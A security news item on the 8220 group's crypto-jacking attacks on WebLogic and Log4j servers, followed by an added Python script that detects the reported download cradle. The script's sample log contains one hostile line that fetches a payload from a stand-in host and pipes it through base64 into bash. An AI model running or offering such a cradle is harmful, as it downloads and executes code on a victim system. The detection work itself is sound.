Thursday, September 5, 2024

8220 Hacker Group Attacking Windows and Linux Web Servers


The 8220 hacker group, first identified in 2017 by Cisco Talos, is exploiting both Windows and Linux web servers with crypto-jacking malware. One of their recent activities involved the exploitation of an Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228).

However, the history of this threat group includes several exploited vulnerabilities in Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 applications. Their TTPs are complex, built on different publicly released exploits.

8220 Hacker Group

In addition, the group was also discovered to be exploiting CVE-2020-14883, a remote code execution vulnerability in Oracle WebLogic Server. This exploitation chain is combined with another vulnerability, an authentication bypass (CVE-2020-14882), in the Oracle WebLogic server.

The exploitation methods for these two vulnerabilities are publicly available, making it relatively easy for the threat actor to modify and use them for malicious purposes.

Two different exploit chains were discovered: one of them allows the loading of an XML file used for the further stages of command execution on the OS, while the other one executes Java code without the use of an XML file.

Infection Chains

The first infection chain uses different XML files depending on the target OS. In the case of Linux, the download of further files is carried out via cURL, wget, lwp-download, and Python urllib, together with a custom bash function that encodes it to base64.

Custom bash function (Source: Imperva)

The second method injects Java code which also first evaluates the OS and then executes the same command strings used in the first method. Once the download and execution process takes place, the compromised hosts are infected with AgentTesla, rhajk, and nasqa malware variants.
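As an added example for detection (not code from the article or from Imperva's report), the script below scores shell command lines, such as those collected from auditd or a bash audit log, for the Linux download cradle described above: several downloaders (cURL, wget, lwp-download, Python urllib) chained as fallbacks, wrapped in a custom bash function, with base64-decoded content piped into a shell. The log lines, the 192.0.2.10 address and the scoring weights are constructed assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Downloaders named in the report; the python pattern requires urllib in the same command
DOWNLOADERS = {
    "curl": r"\bcurl\b",
    "wget": r"\bwget\b",
    "lwp-download": r"\blwp-download\b",
    "python-urllib": r"\bpython[23]?\b[^|;&]*urllib",
}
# base64 decode whose output is fed straight into a shell interpreter
B64_TO_SHELL = re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba|z|da)?sh\b")
# a bash function definition, e.g. "dl() {", wrapping the downloader chain
FUNC_DEF = re.compile(r"\b\w+\s*\(\)\s*\{")


@dataclass
class Finding:
    line_no: int
    downloaders: list
    fallback_chain: bool   # two or more downloaders joined with ||
    b64_to_shell: bool
    defines_function: bool
    score: int


def analyze_command(line_no: int, cmd: str) -> Finding:
    """Score one command line; higher means closer to the reported cradle."""
    tools = [name for name, pat in DOWNLOADERS.items() if re.search(pat, cmd)]
    fallback = len(tools) >= 2 and "||" in cmd
    b64 = bool(B64_TO_SHELL.search(cmd))
    func = bool(FUNC_DEF.search(cmd))
    score = len(tools) + (2 if fallback else 0) + (3 if b64 else 0)
    score += (1 if "lwp-download" in tools else 0) + (1 if func else 0)
    return Finding(line_no, tools, fallback, b64, func, score)


def scan(lines, threshold: int = 3) -> list:
    """Return findings at or above threshold, in log order."""
    found = (analyze_command(i, l) for i, l in enumerate(lines, 1))
    return [f for f in found if f.score >= threshold]


# Constructed sample log: one benign fetch, one cradle, one health check, one bare decode
SAMPLE_LOG = [
    "wget -q https://mirror.example.org/pkg.tar.gz",
    "dl() { curl -fsSL $1 || wget -qO- $1 || lwp-download $1 /tmp/p || "
    "python -c 'import urllib'; }; dl http://192.0.2.10/p | base64 -d | bash",
    "curl -s https://api.example.com/health || echo down",
    "echo 'ZWNobyBoaQo=' | base64 -d | sh",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```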

A full report has been published, which provides detailed information about the exploitation, the commands used, the encoding, and other details.
